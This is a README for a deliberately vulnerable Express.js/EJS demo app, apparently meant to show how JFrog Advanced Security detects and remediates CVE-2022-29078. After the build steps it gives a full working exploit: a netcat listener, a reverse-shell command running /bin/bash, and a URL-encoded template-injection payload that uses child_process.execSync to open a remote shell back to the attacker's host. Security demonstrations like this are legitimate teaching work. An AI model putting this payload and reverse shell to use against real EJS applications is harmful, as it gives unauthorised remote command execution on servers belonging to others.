This a demo Express JS application to illustrate how a critical vulnerability can be exploited and how it could have been detected and remediated using Jfrog Advanced Security new features.
Build the project
npm install
Run it locally
npm start
Build the docker image
docker build . -t vuln-ejs:latest
Run it
docker run -p 3000:3000 vuln-ejs:latest
1 - With netcat start listening on a given host, on the port 1337 for example
nc -lv 1337
Then we will exploit CVE-2022-29078 RCE to create a remote shell by issuing the following command in the container
ncat host.docker.internal 1337 -e /bin/bash
Note : pay attention that the netcat command may differs between the host OS & the container's distro (in macosx is it nc, while in the container it is ncat)
2 - To do that you will exploit the vulnerabilities using the following url
http://localhost:3000/?id=David&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27ncat%20host.docker.internal%201337%20-e%20/bin/bash%27);s
Replace host.docker.internal if needed, to open your remote shell where your step 1 netcat processing is listening.
To trigger the exploit :
open a terminal and run
nc -lv 1337
Then use the link in the application to open the web shell.